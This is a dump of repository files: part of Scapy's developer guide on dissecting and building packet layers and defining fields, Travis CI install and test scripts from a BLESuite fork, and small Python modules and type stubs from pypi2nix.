``pre_dissect()`` is called to prepare the layer.\n- ``do_dissect()`` perform the real dissection of the layer.\n- ``post_dissection()`` is called when some updates are needed on the\n dissected inputs (e.g. deciphering, uncompressing, ... )\n- ``extract_padding()`` is an important function which should be called\n by every layer containing its own size, so that it can tell apart \n in the payload what is really related to this layer and what will\n be considered as additional padding bytes.\n- ``do_dissect_payload()`` is the function in charge of dissecting the\n payload (if any). It is based on ``guess_payload_class()`` (see\n below). Once the type of the payload is known, the payload is bound\n to the current layer with this new type::\n\n def do_dissect_payload(self, s):\n cls = self.guess_payload_class(s)\n p = cls(s, _internal=1, _underlayer=self)\n self.add_payload(p)\n\nAt the end, all the layers in the packet are dissected, and glued\ntogether with their known types.\n\n\nDissecting fields\n-----------------\n\nThe method with all the magic between a layer and its fields is\n``do_dissect()``. If you have understood the different representations of\na layer, you should understand that \"dissecting\" a layer is building\neach of its fields from the machine to the internal representation. \n\nGuess what? That is exactly what ``do_dissect()`` does::\n\n def do_dissect(self, s):\n flist = self.fields_desc[:]\n flist.reverse()\n while s and flist:\n f = flist.pop()\n s,fval = f.getfield(self, s)\n self.fields[f] = fval\n return s\n\nSo, it takes the raw string packet, and feed each field with it, as\nlong as there are data or fields remaining::\n\n >>> FOO(\"\\xff\\xff\"+\"B\"*8)\n <FOO len=2097090 data='BBBBBBB' |>\n\nWhen writing ``FOO(\"\\xff\\xff\"+\"B\"*8)``, it calls ``do_dissect()``. The first\nfield is VarLenQField. Thus, it takes bytes as long as their MSB is\nset, thus until (and including) the first '``B``'. This mapping is done\nthanks to ``VarLenQField.getfield()`` and can be cross-checked::\n\n >>> vlenq2str(2097090)\n '\\xff\\xffB'\n\nThen, the next field is extracted the same way, until 2097090 bytes\nare put in ``FOO.data`` (or less if 2097090 bytes are not available, as\nhere).\n\nIf there are some bytes left after the dissection of the current\nlayer, it is mapped in the same way to the what the next is expected\nto be (``Raw`` by default)::\n\n >>> FOO(\"\\x05\"+\"B\"*8)\n <FOO len=5 data='BBBBB' |<Raw load='BBB' |>>\n\nHence, we need now to understand how layers are bound together.\n\nBinding layers\n--------------\n\nOne of the cool features with Scapy when dissecting layers is that it\ntries to guess for us what the next layer is. The official way to link 2\nlayers is using ``bind_layers()`` function.\n\nAvailable inside the ``packet`` module, this function can be used as following::\n\n bind_layers(ProtoA, ProtoB, FieldToBind=Value)\n\nEach time a packet ``ProtoA()/ProtoB()`` will be created, the ``FieldToBind`` of\n``ProtoA`` will be equal to ``Value``.\n\nFor instance, if you have a class ``HTTP``, you may expect that all the\npackets coming from or going to port 80 will be decoded as such. This\nis simply done that way::\n\n bind_layers( TCP, HTTP, sport=80 )\n bind_layers( TCP, HTTP, dport=80 )\n\nThat's all folks! Now every packet related to port 80 will be\nassociated to the layer ``HTTP``, whether it is read from a pcap file or\nreceived from the network.\n\nThe ``guess_payload_class()`` way\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nSometimes, guessing the payload class is not as straightforward as\ndefining a single port. For instance, it can depend on a value of a\ngiven byte in the current layer. The 2 needed methods are:\n\n- ``guess_payload_class()`` which must return the guessed class for the\n payload (next layer). By default, it uses links between classes\n that have been put in place by ``bind_layers()``.\n\n- ``default_payload_class()`` which returns the default value. This\n method defined in the class ``Packet`` returns ``Raw``, but it can be\n overloaded.\n\nFor instance, decoding 802.11 changes depending on whether it is\nciphered or not::\n\n class Dot11(Packet):\n def guess_payload_class(self, payload):\n if self.FCfield & 0x40:\n return Dot11WEP\n else:\n return Packet.guess_payload_class(self, payload)\n\nSeveral comments are needed here:\n\n- this cannot be done using ``bind_layers()`` because the tests are\n supposed to be \"``field==value``\", but it is more complicated here as we\n test a single bit in the value of a field.\n \n- if the test fails, no assumption is made, and we plug back to the\n default guessing mechanisms calling ``Packet.guess_payload_class()``\n\nMost of the time, defining a method ``guess_payload_class()`` is not a\nnecessity as the same result can be obtained from ``bind_layers()``.\n\nChanging the default behavior\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nIf you do not like Scapy's behavior for a given layer, you can either\nchange or disable it through the call to ``split_layer()``. For instance,\nif you do not want UDP/53 to be bound with ``DNS``, just add in your code:\n``\nsplit_layers(UDP, DNS, sport=53)\n``\nNow every packet with source port 53 will not be handled as DNS, but\nwhatever you specify instead.\n\n\n\nUnder the hood: putting everything together\n-------------------------------------------\n\nIn fact, each layer has a field payload_guess. When you use the\nbind_layers() way, it adds the defined next layers to that list.\n\n::\n\n >>> p=TCP()\n >>> p.payload_guess\n [({'dport': 2000}, <class 'scapy.Skinny'>), ({'sport': 2000}, <class 'scapy.Skinny'>), ... )]\n\nThen, when it needs to guess the next layer class, it calls the\ndefault method ``Packet.guess_payload_class()``. This method runs through\neach element of the list payload_guess, each element being a\ntuple:\n\n- the 1st value is a field to test (``'dport': 2000``)\n- the 2nd value is the guessed class if it matches (``Skinny``)\n\nSo, the default ``guess_payload_class()`` tries all element in the list,\nuntil one matches. If no element are found, it then calls\n``default_payload_class()``. If you have redefined this method, then yours\nis called, otherwise, the default one is called, and ``Raw`` type is\nreturned. \n\n``Packet.guess_payload_class()``\n\n- test what is in field ``guess_payload``\n- call overloaded ``guess_payload_class()``\n\n\nBuilding\n========\n\nBuilding a packet is as simple as building each layer. Then, some\nmagic happens to glue everything. Let's do magic then.\n\nThe basic stuff\n---------------\n\nThe first thing to establish is: what does \"build\" mean? As we have seen, a\nlayer can be represented in different ways (human, internal,\nmachine). Building means going to the machine format.\n\nThe second thing to understand is ''when'' a layer is built. The answer is not\nthat obvious, but as soon as you need the machine representation, the\nlayers are built: when the packet is dropped on the network or written\nto a file, or when it is converted as a string, ... In fact, machine\nrepresentation should be regarded as a big string with the layers\nappended altogether.\n \n::\n\n >>> p = IP()/TCP()\n >>> hexdump(p)\n 0000 45 00 00 28 00 01 00 00 40 06 7C CD 7F 00 00 01 E..(....@.|..... \n 0010 7F 00 00 01 00 14 00 50 00 00 00 00 00 00 00 00 .......P........ \n 0020 50 02 20 00 91 7C 00 00 P. ..|.. \n\nCalling ``raw()`` builds the packet:\n - non instanced fields are set to their default value\n - lengths are updated automatically\n - checksums are computed\n - and so on. \n\nIn fact, using ``raw()`` rather than ``show2()`` or any other method\nis not a random choice as all the functions building the packet calls\n``Packet.__str__()`` (or ``Packet.__bytes__()`` under Python\n3). However, ``__str__()`` calls another method: ``build()``::\n\n def __str__(self):\n return next(iter(self)).build()\n\nWhat is important also to understand is that usually, you do not care\nabout the machine representation, that is why the human and internal\nrepresentations are here. \n\nSo, the core method is ``build()`` (the code has been shortened to keep\nonly the relevant parts)::\n\n def build(self,internal=0):\n pkt = self.do_build()\n pay = self.build_payload()\n p = self.post_build(pkt,pay)\n if not internal:\n pkt = self\n while pkt.haslayer(Padding):\n pkt = pkt.getlayer(Padding)\n p += pkt.load\n pkt = pkt.payload\n return p\n\nSo, it starts by building the current layer, then the payload, and\n``post_build()`` is called to update some late evaluated fields (like\nchecksums). Last, the padding is added to the end of the packet. \n\nOf course, building a layer is the same as building each of its\nfields, and that is exactly what ``do_build()`` does.\n\nBuilding fields\n---------------\n\nThe building of each field of a layer is called in ``Packet.do_build()``::\n\n def do_build(self):\n p=\"\"\n for f in self.fields_desc:\n p = f.addfield(self, p, self.getfieldval(f))\n return p\n\nThe core function to build a field is ``addfield()``. It takes the\ninternal view of the field and put it at the end of ``p``. Usually, this\nmethod calls ``i2m()`` and returns something like ``p.self.i2m(val)`` (where\n``val=self.getfieldval(f)``).\n\nIf ``val`` is set, then ``i2m()`` is just a matter of formatting the value the\nway it must be. For instance, if a byte is expected, ``struct.pack(\"B\", val)``\nis the right way to convert it.\n\nHowever, things are more complicated if ``val`` is not set, it means no\ndefault value was provided earlier, and thus the field needs to\ncompute some \"stuff\" right now or later. \n\n\"Right now\" means thanks to ``i2m()``, if all pieces of information are\navailable. For instance, if you have to handle a length until a\ncertain delimiter. \n\nEx: counting the length until a delimiter\n\n::\n\n class XNumberField(FieldLenField):\n \n def __init__(self, name, default, sep=\"\\r\\n\"):\n FieldLenField.__init__(self, name, default, fld)\n self.sep = sep\n \n def i2m(self, pkt, x):\n x = FieldLenField.i2m(self, pkt, x)\n return \"%02x\" % x\n \n def m2i(self, pkt, x):\n return int(x, 16)\n \n def addfield(self, pkt, s, val):\n return s+self.i2m(pkt, val)\n \n def getfield(self, pkt, s):\n sep = s.find(self.sep)\n return s[sep:], self.m2i(pkt, s[:sep])\n\nIn this example, in ``i2m()``, if ``x`` has already a value, it is converted\nto its hexadecimal value. If no value is given, a length of \"0\" is\nreturned.\n\nThe glue is provided by ``Packet.do_build()`` which calls ``Field.addfield()``\nfor each field in the layer, which in turn calls ``Field.i2m()``: the\nlayer is built IF a value was available.\n\n\nHandling default values: ``post_build``\n---------------------------------------\n\nA default value for a given field is sometimes either not known or\nimpossible to compute when the fields are put together. For instance,\nif we used a ``XNumberField`` as defined previously in a layer, we expect\nit to be set to a given value when the packet is built. However,\nnothing is returned by ``i2m()`` if it is not set. \n\nThe answer to this problem is ``Packet.post_build()``. \n\nWhen this method is called, the packet is already built, but some\nfields still need to be computed. This is typically what is required\nto compute checksums or lengths. In fact, this is required each time a\nfield's value depends on something which is not in the current \n\nSo, let us assume we have a packet with a ``XNumberField``, and have a\nlook to its building process::\n\n class Foo(Packet):\n fields_desc = [\n ByteField(\"type\", 0),\n XNumberField(\"len\", None, \"\\r\\n\"),\n StrFixedLenField(\"sep\", \"\\r\\n\", 2)\n ]\n \n def post_build(self, p, pay):\n if self.len is None and pay:\n l = len(pay)\n p = p[:1] + hex(l)[2:]+ p[2:]\n return p+pay\n\nWhen ``post_build()`` is called, ``p`` is the current layer, ``pay`` the payload,\nthat is what has already been built. We want our length to be the full\nlength of the data put after the separator, so we add its computation\nin ``post_build()``. \n\n::\n\n >>> p = Foo()/(\"X\"*32)\n >>> p.show2()\n ###[ Foo ]###\n type= 0\n len= 32\n sep= '\\r\\n'\n ###[ Raw ]###\n load= 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'\n\n``len`` is correctly computed now::\n\n >>> hexdump(raw(p))\n 0000 00 32 30 0D 0A 58 58 58 58 58 58 58 58 58 58 58 .20..XXXXXXXXXXX\n 0010 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX\n 0020 58 58 58 58 58 XXXXX\n\nAnd the machine representation is the expected one.\n\n\nHandling default values: automatic computation\n----------------------------------------------\n\nAs we have previously seen, the dissection mechanism is built upon the\nlinks between the layers created by the programmer. However, it can\nalso be used during the building process.\n\nIn the layer ``Foo()``, our first byte is the type, which defines what\ncomes next, e.g. if ``type=0``, next layer is ``Bar0``, if it is 1, next layer\nis ``Bar1``, and so on. We would like then this field to be set\nautomatically according to what comes next.\n \n::\n\n class Bar1(Packet):\n fields_desc = [\n IntField(\"val\", 0),\n ]\n \n class Bar2(Packet):\n fields_desc = [\n IPField(\"addr\", \"127.0.0.1\")\n ]\n\nIf we use these classes with nothing else, we will have trouble when\ndissecting the packets as nothing binds Foo layer with the multiple\n``Bar*`` even when we explicitly build the packet through the call to\n``show2()``::\n\n >>> p = Foo()/Bar1(val=1337)\n >>> p\n <Foo |<Bar1 val=1337 |>>\n >>> p.show2()\n ###[ Foo ]###\n type= 0\n len= 4\n sep= '\\r\\n'\n ###[ Raw ]###\n load= '\\x00\\x00\\x059'\n\nProblems:\n \n1. ``type`` is still equal to 0 while we wanted it to be automatically\n set to 1. We could of course have built ``p`` with ``p = Foo(type=1)/Bar0(val=1337)``\n but this is not very convenient.\n \n2. the packet is badly dissected as ``Bar1`` is regarded as ``Raw``. This\n is because no links have been set between ``Foo()`` and ``Bar*()``.\n\nIn order to understand what we should have done to obtain the proper\nbehavior, we must look at how the layers are assembled. When two\nindependent packets instances ``Foo()`` and ``Bar1(val=1337)`` are\ncompounded with the '/' operator, it results in a new packet where the\ntwo previous instances are cloned (i.e. are now two distinct objects\nstructurally different, but holding the same values)::\n\n def __div__(self, other):\n if isinstance(other, Packet):\n cloneA = self.copy()\n cloneB = other.copy()\n cloneA.add_payload(cloneB)\n return cloneA\n elif type(other) is str:\n return self/Raw(load=other)\n\nThe right-hand side of the operator becomes the payload of the left-hand\nside. This is performed through the call to ``add_payload()``. Finally, the new packet is returned.\n\nNote: we can observe that if other isn't a ``Packet`` but a string,\nthe ``Raw`` class is instantiated to form the payload. Like in this\nexample::\n\n >>> IP()/\"AAAA\"\n <IP |<Raw load='AAAA' |>>\n\nWell, what ``add_payload()`` should implement? Just a link between\ntwo packets? Not only, in our case, this method will appropriately set\nthe correct value to ``type``.\n\nInstinctively we feel that the upper layer (the right of '/') can\ngather the values to set the fields to the lower layer (the left of\n'/'). Like previously explained, there is a convenient mechanism to\nspecify the bindings in both directions between two neighboring\nlayers.\n\nOnce again, these informations must be provided to ``bind_layers()``,\nwhich will internally call ``bind_top_down()`` in charge to\naggregate the fields to overload. In our case what we need to specify\nis::\n\n bind_layers( Foo, Bar1, {'type':1} )\n bind_layers( Foo, Bar2, {'type':2} )\n\nThen, ``add_payload()`` iterates over the ``overload_fields`` of\nthe upper packet (the payload), get the fields associated to the lower\npacket (by its type) and insert them in ``overloaded_fields``.\n \nFor now, when the value of this field will be requested,\n``getfieldval()`` will return the value inserted in\n``overloaded_fields``.\n\nThe fields are dispatched between three dictionaries:\n\n- ``fields``: fields whose the value have been explicitly set, like\n ``pdst`` in TCP (``pdst='42'``)\n- ``overloaded_fields``: overloaded fields\n- ``default_fields``: all the fields with their default value (these fields \n are initialized according to ``fields_desc`` by the constructor \n by calling ``init_fields()`` ).\n\nIn the following code, we can observe how a field is selected and its\nvalue returned::\n\n def getfieldval(self, attr):\n for f in self.fields, self.overloaded_fields, self.default_fields:\n if f.has_key(attr):\n return f[attr]\n return self.payload.getfieldval(attr)\n\nFields inserted in ``fields`` have the higher priority, then\n``overloaded_fields``, then finally ``default_fields``. Hence, if\nthe field ``type`` is set in ``overloaded_fields``, its value will\nbe returned instead of the value contained in ``default_fields``.\n\n\nWe are now able to understand all the magic behind it!\n\n::\n\n >>> p = Foo()/Bar1(val=0x1337)\n >>> p\n <Foo type=1 |<Bar1 val=4919 |>>\n >>> p.show()\n ###[ Foo ]###\n type= 1\n len= 4\n sep= '\\r\\n'\n ###[ Bar1 ]###\n val= 4919\n \nOur 2 problems have been solved without us doing much: so good to be\nlazy :)\n\nUnder the hood: putting everything together\n-------------------------------------------\n\nLast but not least, it is very useful to understand when each function\nis called when a packet is built::\n\n >>> hexdump(raw(p))\n Packet.str=Foo\n Packet.iter=Foo\n Packet.iter=Bar1\n Packet.build=Foo\n Packet.build=Bar1\n Packet.post_build=Bar1\n Packet.post_build=Foo\n\nAs you can see, it first runs through the list of each field, and then\nbuild them starting from the beginning. Once all layers have been\nbuilt, it then calls ``post_build()`` starting from the end.\n\n\nFields \n======\n\n.. index::\n single: fields\n\nHere's a list of fields that Scapy supports out of the box: \n\nSimple datatypes\n----------------\n\nLegend: \n\n- ``X`` - hexadecimal representation\n- ``LE`` - little endian (default is big endian = network byte order)\n- ``Signed`` - signed (default is unsigned)\n\n::\n\n ByteField \n XByteField \n \n ShortField\n SignedShortField\n LEShortField\n XShortField\n \n X3BytesField # three bytes (in hexad \n \n IntField\n SignedIntField\n LEIntField\n LESignedIntField\n XIntField\n \n LongField\n LELongField\n XLongField\n LELongField\n \n IEEEFloatField\n IEEEDoubleField \n BCDFloatField # binary coded decimal\n \n BitField\n XBitField\n \n BitFieldLenField # BitField specifying a length (used in RTP)\n FlagsField \n FloatField\n\nEnumerations\n------------\n\nPossible field values are taken from a given enumeration (list, dictionary, ...) \ne.g.::\n\n ByteEnumField(\"code\", 4, {1:\"REQUEST\",2:\"RESPONSE\",3:\"SUCCESS\",4:\"FAILURE\"})\n\n::\n\n EnumField(name, default, enum, fmt = \"H\")\n CharEnumField\n BitEnumField\n ShortEnumField\n LEShortEnumField\n ByteEnumField\n IntEnumField\n SignedIntEnumField\n LEIntEnumField\n XShortEnumField\n\nStrings\n-------\n\n::\n\n StrField(name, default, fmt=\"H\", remain=0, shift=0)\n StrLenField(name, default, fld=None, length_from=None, shift=0):\n StrFixedLenField\n StrNullField\n StrStopField\n\nLists and lengths\n-----------------\n\n::\n\n FieldList(name, default, field, fld=None, shift=0, length_from=None, count_from=None)\n # A list assembled and dissected with many times the same field type\n \n # field: instance of the field that will be used to assemble and disassemble a list item\n # length_from: name of the FieldLenField holding the list length\n \n FieldLenField # holds the list length of a FieldList field\n LEFieldLenField\n \n LenField # contains len(pkt.payload)\n \n PacketField # holds packets\n PacketLenField # used e.g. in ISAKMP_payload_Proposal\n PacketListField\n\n\nVariable length fields\n^^^^^^^^^^^^^^^^^^^^^^\n\nThis is about how fields that have a variable length can be handled with Scapy. These fields usually know their length from another field. Let's call them varfield and lenfield. The idea is to make each field reference the other so that when a packet is dissected, varfield can know its length from lenfield when a packet is assembled, you don't have to fill lenfield, that will deduce its value directly from varfield value.\n\nProblems arise when you realize that the relation between lenfield and varfield is not always straightforward. Sometimes, lenfield indicates a length in bytes, sometimes a number of objects. Sometimes the length includes the header part, so that you must subtract the fixed header length to deduce the varfield length. Sometimes the length is not counted in bytes but in 16bits words. Sometimes the same lenfield is used by two different varfields. Sometimes the same varfield is referenced by two lenfields, one in bytes one in 16bits words.\n\n \nThe length field\n~~~~~~~~~~~~~~~~\n\nFirst, a lenfield is declared using ``FieldLenField`` (or a derivate). If its value is None when assembling a packet, its value will be deduced from the varfield that was referenced. The reference is done using either the ``length_of`` parameter or the ``count_of`` parameter. The ``count_of`` parameter has a meaning only when varfield is a field that holds a list (``PacketListField`` or ``FieldListField``). The value will be the name of the varfield, as a string. According to which parameter is used the ``i2len()`` or ``i2count()`` method will be called on the varfield value. The returned value will the be adjusted by the function provided in the adjust parameter. adjust will be applied to 2 arguments: the packet instance and the value returned by ``i2len()`` or ``i2count()``. By default, adjust does nothing::\n\n adjust=lambda pkt,x: x\n\nFor instance, if ``the_varfield`` is a list\n\n::\n\n FieldLenField(\"the_lenfield\", None, count_of=\"the_varfield\")\n\nor if the length is in 16bits words::\n\n FieldLenField(\"the_lenfield\", None, length_of=\"the_varfield\", adjust=lambda pkt,x:(x+1)/2)\n\nThe variable length field\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\nA varfield can be: ``StrLenField``, ``PacketLenField``, ``PacketListField``, ``FieldListField``, ...\n\nFor the two firsts, when a packet is being dissected, their lengths are deduced from a lenfield already dissected. The link is done using the ``length_from`` parameter, which takes a function that, applied to the partly dissected packet, returns the length in bytes to take for the field. For instance::\n\n StrLenField(\"the_varfield\", \"the_default_value\", length_from = lambda pkt: pkt.the_lenfield)\n\nor\n\n::\n\n StrLenField(\"the_varfield\", \"the_default_value\", length_from = lambda pkt: pkt.the_lenfield-12)\n\nFor the ``PacketListField`` and ``FieldListField`` and their derivatives, they work as above when they need a length. If they need a number of elements, the length_from parameter must be ignored and the count_from parameter must be used instead. For instance::\n\n FieldListField(\"the_varfield\", [\"1.2.3.4\"], IPField(\"\", \"0.0.0.0\"), count_from = lambda pkt: pkt.the_lenfield)\n\nExamples\n^^^^^^^^\n\n::\n\n class TestSLF(Packet):\n fields_desc=[ FieldLenField(\"len\", None, length_of=\"data\"),\n StrLenField(\"data\", \"\", length_from=lambda pkt:pkt.len) ]\n \n class TestPLF(Packet):\n fields_desc=[ FieldLenField(\"len\", None, count_of=\"plist\"),\n PacketListField(\"plist\", None, IP, count_from=lambda pkt:pkt.len) ]\n \n class TestFLF(Packet):\n fields_desc=[ \n FieldLenField(\"the_lenfield\", None, count_of=\"the_varfield\"), \n FieldListField(\"the_varfield\", [\"1.2.3.4\"], IPField(\"\", \"0.0.0.0\"), \n count_from = lambda pkt: pkt.the_lenfield) ]\n\n class TestPkt(Packet):\n fields_desc = [ ByteField(\"f1\",65),\n ShortField(\"f2\",0x4244) ]\n def extract_padding(self, p):\n return \"\", p\n \n class TestPLF2(Packet):\n fields_desc = [ FieldLenField(\"len1\", None, count_of=\"plist\",fmt=\"H\", adjust=lambda pkt,x:x+2),\n FieldLenField(\"len2\", None, length_of=\"plist\",fmt=\"I\", adjust=lambda pkt,x:(x+1)/2),\n PacketListField(\"plist\", None, TestPkt, length_from=lambda x:(x.len2*2)/3*3) ]\n\nTest the ``FieldListField`` class::\n \n >>> TestFLF(\"\\x00\\x02ABCDEFGHIJKL\")\n <TestFLF the_lenfield=2 the_varfield=['65.66.67.68', '69.70.71.72'] |<Raw load='IJKL' |>>\n\n\nSpecial\n-------\n\n::\n\n Emph # Wrapper to emphasize field when printing, e.g. Emph(IPField(\"dst\", \"127.0.0.1\")),\n \n ActionField\n \n ConditionalField(fld, cond)\n # Wrapper to make field 'fld' only appear if\n # function 'cond' evals to True, e.g. \n # ConditionalField(XShortField(\"chksum\",None),lambda pkt:pkt.chksumpresent==1)\n \n \n PadField(fld, align, padwith=None) \n # Add bytes after the proxified field so that it ends at\n # the specified alignment from its beginning\n\nTCP/IP\n------\n\n::\n\n IPField\n SourceIPField\n \n IPoptionsField\n TCPOptionsField\n \n MACField\n DestMACField(MACField)\n SourceMACField(MACField)\n ARPSourceMACField(MACField)\n \n ICMPTimeStampField\n\n802.11\n------\n\n::\n\n Dot11AddrMACField\n Dot11Addr2MACField\n Dot11Addr3MACField\n Dot11Addr4MACField\n Dot11SCField\n\nDNS\n---\n\n::\n\n DNSStrField\n DNSRRCountField\n DNSRRField\n DNSQRField\n RDataField\n RDLenField\n\nASN.1\n-----\n\n::\n\n ASN1F_element\n ASN1F_field\n ASN1F_INTEGER\n ASN1F_enum_INTEGER\n ASN1F_STRING\n ASN1F_OID\n ASN1F_SEQUENCE\n ASN1F_SEQUENCE_OF\n ASN1F_PACKET\n ASN1F_CHOICE\n\nOther protocols\n---------------\n\n::\n\n NetBIOSNameField # NetBIOS (StrFixedLenField) \n \n ISAKMPTransformSetField # ISAKMP (StrLenField) \n \n TimeStampField # NTP (BitField)\n\n\nDesign patterns\n===============\nSome patterns are similar to a lot of protocols and thus can be described the same way in Scapy.\n\nThe following parts will present several models and conventions that can be followed when implementing a new protocol.\n\nField naming convention\n-----------------------\nThe goal is to keep the writing of packets fluent and intuitive. The basic instructions are the following :\n\n* Use inverted camel case and common abbreviations (e.g. len, src, dst, dstPort, srcIp).\n* Wherever it is either possible or relevant, prefer using the names from the specifications. This aims to help newcomers to easily forge packets.\n" }, { "alpha_fraction": 0.5877862572669983, "alphanum_fraction": 0.6030534505844116, "avg_line_length": 20.129032135009766, "blob_id": "7bb1cf40acc3e813d9ae13f8bb6f670fead0121b", "content_id": "6e1b9d329605e7741c7c51a988fdb0c0840029d6", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 655, "license_type": "permissive", "max_line_length": 66, "num_lines": 31, "path": "/scapy/.travis/test.sh", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "if [ \"$TRAVIS_OS_NAME\" = \"linux\" ]\nthen\n # Linux\n UT_FLAGS=\" -K tshark\" # TODO: also test as root ?\n if [ \"$TRAVIS_SUDO\" != \"true\" ]\n then\n # Linux non root\n UT_FLAGS+=\" -K manufdb\"\n fi\n # pypy\n if python --version 2>&1 | grep -q PyPy\n then\n # cryptography requires PyPy >= 2.6, Travis CI uses 2.5.0\n UT_FLAGS+=\" -K crypto -K not_pypy\"\n fi\nelif [ \"$TRAVIS_OS_NAME\" = \"osx\" ]\nthen\n UT_FLAGS=\" -K tcpdump\"\nfi\n\nif [[ $TOXENV == py3* ]]\nthen\n # Some Python 3 tests currently fail. They should be tracked and\n # fixed.\n UT_FLAGS+=\" -K FIXME_py3\"\nfi\n\n# Dump Environment (so that we can check PATH, UT_FLAGS, etc.)\nset\n\ntox -- $UT_FLAGS\n" }, { "alpha_fraction": 0.6388888955116272, "alphanum_fraction": 0.6533816456794739, "avg_line_length": 25.70967674255371, "blob_id": "382f98774e96f5ebcf7f6899252d93125f0aad8f", "content_id": "98747a8f21f1275333ac0b133c0def071397ba62", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 828, "license_type": "permissive", "max_line_length": 139, "num_lines": 31, "path": "/scapy/.travis/install.sh", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "# Detect the pip version\nPIP=`which pip || (python --version 2>&1 | grep -q 'Python 2' && which pip2) || (python --version 2>&1 | grep -q 'Python 3' && which pip3)`\n\n# Install Python3 on osx\nif [ \"$TRAVIS_OS_NAME\" = \"osx\" ] && ! python3\nthen\n brew upgrade python\n pip3 install tox\n if [ ! -z $SCAPY_USE_PCAPDNET ]\n then\n brew update\n brew install libdnet libpcap\n fi\n exit 0\nfi\n\n# Install wireshark data\nif [ \"$TRAVIS_OS_NAME\" = \"linux\" ] && [ \"$TRAVIS_SUDO\" = \"true\" ]\nthen\n sudo apt-get -qy install tshark\n sudo apt-get -qy install can-utils build-essential linux-headers-$(uname -r);\nfi\n\n# Install pcap & dnet\nif [ ! -z $SCAPY_USE_PCAPDNET ] && [ \"$TRAVIS_OS_NAME\" = \"linux\" ]\nthen\n $SCAPY_SUDO apt-get -qy install libdumbnet-dev libpcap-dev\nfi\n\n# Make sure tox is installed and up to date\n$PIP install -U tox\n" } ]
38
garbas/pypi2nix
https://github.com/garbas/pypi2nix
47909d79f44b06d63d52780989d89c5e4094488c
4a5a9d399e960d85b3e37b6a564bcbe655287e3c
c14585a236b582a843511326ca3bb0c616556075
refs/heads/master
2021-05-22T04:13:11.331122
2021-04-01T10:01:11
2021-04-01T10:01:11
4,310,097
128
35
null
null
null
null
null
[ { "alpha_fraction": 0.5974025726318359, "alphanum_fraction": 0.5974025726318359, "avg_line_length": 37.5, "blob_id": "1e69d689a7070310a7f897dfff17b54981ded4d9", "content_id": "8d01913a6d6411c8dd67d430a1b48048a8203416", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 77, "license_type": "no_license", "max_line_length": 38, "num_lines": 2, "path": "/src/pypi2nix/nix_language.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "def escape_string(string: str) -> str:\n return string.replace('\"', '\\\\\"')\n" }, { "alpha_fraction": 0.7471264600753784, "alphanum_fraction": 0.7471264600753784, "avg_line_length": 28.33333396911621, "blob_id": "5b19bab45cb69f7e59b95eea4aac7e74f132a90d", "content_id": "3e162dcf2d6595c10b0dbe333002d3e354e44997", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 87, "license_type": "no_license", "max_line_length": 68, "num_lines": 3, "path": "/pytest.ini", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "[pytest]\nmarkers =\n nix: marks tests that that cannot run inside a nix build sandbox" }, { "alpha_fraction": 0.8771929740905762, "alphanum_fraction": 0.8771929740905762, "avg_line_length": 39.71428680419922, "blob_id": "b6681404435440d9b2f0d09a6103fac39f61792e", "content_id": "3c230bf9445f61a114b2d4fe0a23aa74be60eb6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 285, "license_type": "no_license", "max_line_length": 47, "num_lines": 7, "path": "/src/pypi2nix/package/__init__.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .exceptions import DistributionNotDetected\nfrom .interfaces import HasBuildDependencies\nfrom .interfaces import HasPackageName\nfrom .interfaces import HasRuntimeDependencies\nfrom .metadata import PackageMetadata\nfrom .pyproject import PyprojectToml\nfrom .setupcfg import SetupCfg\n" }, { "alpha_fraction": 0.707317054271698, "alphanum_fraction": 0.707317054271698, "avg_line_length": 19.5, "blob_id": "e5e23ff1c0c3fae5ee52d35db99ea8d94dd8367e", "content_id": "b60f50ad3f635c01e9a901f17b446bf6a50ba829", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 205, "license_type": "no_license", "max_line_length": 36, "num_lines": 10, "path": "/src/pypi2nix/external_dependencies/external_dependency.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from attr import attrib\nfrom attr import attrs\n\n\n@attrs(frozen=True)\nclass ExternalDependency:\n _attribute_name: str = attrib()\n\n def attribute_name(self) -> str:\n return self._attribute_name\n" }, { "alpha_fraction": 0.4853801131248474, "alphanum_fraction": 0.4853801131248474, "avg_line_length": 25.30769157409668, "blob_id": "7f10f5c657d469993c17681bd701d49e52833045", "content_id": "3d2f3fc83b484214e5bbb2a4f1e3c62c93096c8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 342, "license_type": "no_license", "max_line_length": 47, "num_lines": 13, "path": "/mypy/venv.pyi", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import Optional\n\nclass EnvBuilder:\n def __init__(\n self,\n system_site_packages: bool = ...,\n clear: bool = ...,\n symlinks: bool = ...,\n upgrade: bool = ...,\n with_pip: bool = ...,\n prompt: Optional[str] = None,\n ) -> None: ...\n def create(self, env_dir: str) -> None: ...\n" }, { "alpha_fraction": 0.6968085169792175, "alphanum_fraction": 0.6968085169792175, "avg_line_length": 30.33333396911621, "blob_id": "6daf5d083f7125ec68daa339ea8771216d57ba68", "content_id": "4054cbc713a55f3d74113f25916d9d1b16231ee0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 376, "license_type": "no_license", "max_line_length": 58, "num_lines": 12, "path": "/integrationtests/test_lektor.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import 